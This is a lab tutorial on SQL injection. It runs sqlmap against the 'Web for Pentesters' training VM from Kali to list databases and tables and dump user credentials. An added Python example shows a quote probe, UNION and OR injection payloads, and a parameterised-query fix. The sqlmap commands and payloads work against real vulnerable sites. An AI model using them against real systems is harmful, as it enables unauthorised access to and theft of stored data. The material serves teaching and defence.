
SQL Injection using Sqlmap

Today we will carry out a SQL injection attack using a tool known as sqlmap. First we have to find out whether the web application is vulnerable to SQL injection by locating a vulnerable link, i.e. a vulnerable URL. A good place to start is a URL that carries a parameter and a value in its query string, because that value is likely to end up inside a database query on the server.


Ex. See the URL below:


http://www.abc.com/cat.php?id=1


Here you can see that the URL is for a page called cat.php and that it carries one parameter, id, with the value 1. The page accepts that value and uses it to decide what to show, most likely by looking up the record whose id is 1.


In a SQL injection attack you inject SQL code, so you must know where that code can enter the query. URLs like this one are the candidates: the value of the parameter 'id' is the place where the SQL code will be injected.



Deliverable:


Lab Set up

  • Virtualization using Oracle Virtual box

  • Attacker’s System: Kali Linux

  • Target System : Web for Pentesters


1. In Kali Linux --> Browser --> Visit the webpage.

Ex. Put the IP address of the target system in Kali Linux's browser. Then click on Example 1 of SQL Injection. The URL in the web browser will look like the following:


http://192.168.0.101/sqli/example1.php?name=root


Here you can see that this URL is for example1.php with a parameter called name whose value is root.


Try changing that value to 'admin'. The URL will be as follows:


http://192.168.0.101/sqli/example1.php?name=admin


You will get a different web page, which means the application uses the value of the parameter to build its response. A quick manual check for injection is to append a single quote (name=root') and see whether the page returns a database error or changes unexpectedly; sqlmap automates this and many other probes in the next step.



2. Now give that vulnerable link to sqlmap to get database name.

~# sqlmap --url="http://192.168.0.101/sqli/example1.php?name=root" --dbs


Here, --dbs --> enumerate the database names. sqlmap will ask a few yes/no questions while it confirms the injection point and identifies the back-end DBMS; add --batch to accept the default answers without prompting.


You will get a list of all the databases in the database system.



3. Once you have a database name, find the tables in that database.

~# sqlmap --url="http://192.168.0.101/sqli/example1.php?name=root" -D [database name] --tables


Here, -D --> Database

--tables --> to get tables


You will get all the tables in that database.



4. Now simply get all the data from the table.

~# sqlmap --url="http://192.168.0.101/sqli/example1.php?name=root" -D [database name] -T [table name] --dump


Here, -T --> Table

--dump --> dump all the data from table


Thus you will get all the data of the table, including usernames, ids, passwords, etc. Note that passwords are often stored as hashes; when sqlmap recognises a hash format in the dumped columns it offers to run a dictionary attack against it.
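To show what the manual quote check in step 1 and the sqlmap enumeration in steps 2 to 4 actually exploit, here is an added Python example. It is not part of the original lab, of sqlmap, or of Web for Pentesters. It builds a small in-memory SQLite database with constructed sample users, implements the query behind a page like example1.php in both its vulnerable (string-concatenated) and hardened (parameterised) forms, then shows the single-quote probe, a UNION payload that lists the tables (the by-hand equivalent of --tables; on MySQL the catalogue would be information_schema rather than sqlite_master) and an OR payload that dumps every row (the equivalent of --dump). The table, column and user names are assumptions.

```python
"""Simulated example1.php?name=... endpoint (added example, not the lab's or sqlmap's code)."""
import sqlite3


def make_db():
    """Create an in-memory database with constructed sample rows (assumed schema)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, password TEXT)")
    conn.executemany(
        "INSERT INTO users (name, password) VALUES (?, ?)",
        [("root", "s3cr3t"), ("admin", "hunter2"), ("guest", "guest")],  # constructed data
    )
    conn.commit()
    return conn


def lookup_vulnerable(conn, name):
    """The bug class the lab exploits: the URL parameter is pasted into the SQL text."""
    sql = "SELECT id, name, password FROM users WHERE name = '" + name + "'"
    return conn.execute(sql).fetchall()


def lookup_safe(conn, name):
    """Hardened form: the value travels as a bound parameter, never as SQL syntax."""
    sql = "SELECT id, name, password FROM users WHERE name = ?"
    return conn.execute(sql, (name,)).fetchall()


def probe_for_injection(conn, lookup, name):
    """Step 1 by hand: append a single quote and see whether the query breaks.

    Returns True when the stray quote produces a database error, which is the
    classic sign that the parameter is concatenated into the query.
    """
    try:
        lookup(conn, name + "'")
    except sqlite3.OperationalError:
        return True
    return False


def enumerate_tables(conn):
    """Steps 2/3 by hand: a UNION payload that reads the catalogue instead of users.

    The injected SELECT must return the same number of columns (3) as the
    original query; '--' comments out the trailing quote the PHP code appends.
    """
    payload = "x' UNION SELECT 1, name, sql FROM sqlite_master WHERE type='table' --"
    rows = lookup_vulnerable(conn, payload)
    return [row[1] for row in rows]


def dump_all_rows(conn):
    """Step 4 by hand: an always-true OR condition returns every row of the table."""
    return lookup_vulnerable(conn, "x' OR '1'='1")


if __name__ == "__main__":
    db = make_db()
    print("normal lookup:", lookup_vulnerable(db, "root"))
    print("quote probe (vulnerable):", probe_for_injection(db, lookup_vulnerable, "root"))
    print("quote probe (parameterised):", probe_for_injection(db, lookup_safe, "root"))
    print("tables via injection:", enumerate_tables(db))
    print("dump via injection:", dump_all_rows(db))
    print("same payload against parameterised query:", lookup_safe(db, "x' OR '1'='1"))
```

The parameterised variant treats the whole payload as a literal username, so the probe returns no error and the OR payload returns no rows; this is the fix that makes the sqlmap steps above fail against a page.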

